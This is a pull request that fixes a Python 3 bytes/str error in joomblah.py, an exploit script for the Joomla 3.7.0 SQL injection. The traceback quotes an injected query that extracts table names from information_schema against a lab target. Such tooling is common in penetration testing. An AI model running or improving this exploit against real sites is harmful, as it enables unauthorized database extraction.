### PR TITLE
fix: decode binary string after unhexlify() as ascii

### DIFF
--- a/joomblah.py
+++ b/joomblah.py
@@ -41,7 +41,7 @@ def joomla_370_sqli_extract(options, sess, token, colname, morequery):
 		if not value:
 			print(" [!] Failed to retrieve string for query:", sqli)
 			return None
-		value = binascii.unhexlify(value)
+		value = binascii.unhexlify(value).decode('ascii')
 		result += value
 		offset += len(value)
 	return result


### PR DESCRIPTION
This PR fixes an error when running this script on Python 3 (tested on 3.9.2):

```
Traceback (most recent call last):
  File "/home/schaermu/targets/***/joomblah.py", line 185, in <module>
    sys.exit(main("http://192.168.10.100:8080/joomla"))
  File "/home/schaermu/targets/***/joomblah.py", line 182, in main
    pwn_joomla_again(options)
  File "/home/schaermu/targets/***/joomblah.py", line 146, in pwn_joomla_again
    tables = extract_joomla_tables(options, sess, token)
  File "/home/schaermu/targets/***/joomblah.py", line 73, in extract_joomla_tables
    result = joomla_370_sqli_extract(options, sess, token, "TABLE_NAME", "FROM information_schema.tables WHERE TABLE_NAME LIKE 0x257573657273 LIMIT " + str(offset) + ",1" )
  File "/home/schaermu/targets/***/joomblah.py", line 45, in joomla_370_sqli_extract
    result += value
TypeError: can only concatenate str (not "bytes") to str
```